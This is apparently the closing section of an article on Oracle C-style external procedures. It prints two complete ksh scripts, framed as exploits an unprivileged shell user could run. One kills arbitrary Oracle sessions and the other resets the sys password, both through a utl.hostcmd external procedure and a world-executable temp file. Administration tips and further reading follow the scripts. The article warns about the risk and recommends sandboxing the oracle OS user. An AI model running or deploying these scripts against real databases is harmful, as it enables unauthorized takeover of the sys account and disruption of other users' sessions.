Great Exploitations


As discussed above, C-style external procedures can make your system extremely vulnerable to a malicious user with shell access. Here are some scripts that could allow an unprivileged user to do things that he probably was not intended to do:


Assassin script: Killing of Oracle Sessions


  1. #!/usr/bin/ksh
  2. if [[ -z $1 ]]; then
  3.   cat <<EOF
  4. Usage:        ${0##*/} PASSWD
  5. Achtung!      This script kills Oracle sessions.
  6. The utl.hostcmd function needs to be installed
  7. and that external procedures on Oracle are working
  8. Requirements: The PL/SQL hostcmd function and its binary library
  9. Parmaters:    1 SID
  10.               2 SERIAL#
  11. Environment:  ORACLE_SID should be defined.
  12. EOF
  13.   echo "Exiting..."
  14.   exit 1
  15. fi
  17. SID=$1
  18. SERIAL=$2
  19. [[ -z $ORACLE_SID ]] && echo "ORACLE_SID is not defined. Exiting..." && exit 1
  20. LOGFILE=/tmp/${0##*/}.log
  21. TMPFILE=/tmp/${0##*/}$$
  23. cat > $TMPFILE<<EOF
  24. #!/usr/bin/ksh
  27. COMMAND="alter system kill session '$1,$2'"
  28. echo "Killing oracle session '$1,$2' on Oracle instance $ORACLE_SID" >> $LOGFILE
  29. sqlplus  -s / >> $LOGFILE 2>&1 <<!
  30. $COMMAND;
  31. !
  32. RETCODE=$?
  33. echo $RETCODE >> $LOGFILE
  34. exit $RETCODE
  35. EOF
  36. chmod 777 $TMPFILE
  38. # Execute script
  39. sqlplus  -s / >> $LOGFILE <<!
  40. set feedback off
  41. set autoprint on
  42. var RESULT number
  43. exec :RESULT:=utl.hostcmd('$TMPFILE');
  44. !
  45. rm -f $TMPFILE



Change Oracle's 'sys' password 


  1. #!/usr/bin/ksh
  2. if [[ -z $1 ]]; then
  3.   cat <<EOF
  4. Usage:        ${0##*/} PASSWD
  5. Achtung!      This script attempts to set the sys user password by exploiting
  6. C-style external procedures.
  7. Use this with care and only in extreme cases!
  8. Requirements: The PL/SQL hostcmd function and its binary library
  9. Parmaters:    Desired PASSWD
  10. Environment:  ORACLE_SID should be defined.
  11. EOF
  12.   exit 1
  13. fi
  15. PASSWD=$1
  16. [[ -z $ORACLE_SID ]] && echo "ORACLE_SID is not defined. Exiting..." && exit 1
  17. LOGFILE=/tmp/${0##*/}.log
  18. TMPFILE=/tmp/${0##*/}$$
  20. # Create script that will be run as Oracle user sys:
  21. cat > $TMPFILE<<EOF
  22. #!/usr/bin/ksh
  24. COMMAND="alter user sys identified by $PASSWD"
  25. echo "Changing sys password on Oracle instance $ORACLE_SID" | tee -a $LOGFILE
  26. sqlplus / >> $LOGFILE 2>&1 <<!
  27. $COMMAND;
  28. !
  30. RETCODE=$?
  31. echo $RETCODE >> $LOGFILE
  32. exit $RETCODE
  33. EOF
  34. chmod 777 $TMPFILE
  36. # Execute script
  37. sqlplus  / >> $LOGFILE <<!
  38. set feedback off
  39. set autoprint on
  40. var RESULT number
  41. exec :RESULT:=utl.hostcmd('$TMPFILE');
  42. quit :RESULT
  43. !
  45. RETCODE=$?
  46. # Clean up
  47. rm -f $TMPFILE
  48. exit $RETCODE


Final Notes


1. It is only necessary to register an external procedure once,  unless the interfaces to the procedure changes. Subsequent rebuilds due to code changes in the external procedures do not affect the registration with Oracle.

2. When registering an external procedure, it is essential to state the absolute path of the binary that holds the external procedure(s).

3. Once an Oracle session has executed an external procedure, it has been found that the session can lock the binary for some time. This can slow the development / test iteration cycle down, but can be circumvented by restarting the Oracle session (e.g. log out and then in again).

4. An external procedure has permission to execute any commands that the O/S user 'oracle' is able to execute. It is therefore wise to sandbox the O/S user 'oracle'.

5. On UNIX (as opposed to Linux), ensure that the linker is not a GNU linker but is the proprietory linker that came with the system.


Other Reading


Oracle Application Developer's Guide - Fundamentals. Chapter 10 - Calling External Procedures.

Oracle Supplied PL/SQL Packages and Type Reference. Chapter 92 - DEBUG_EXTPROC.

© Gerrit Hoekstra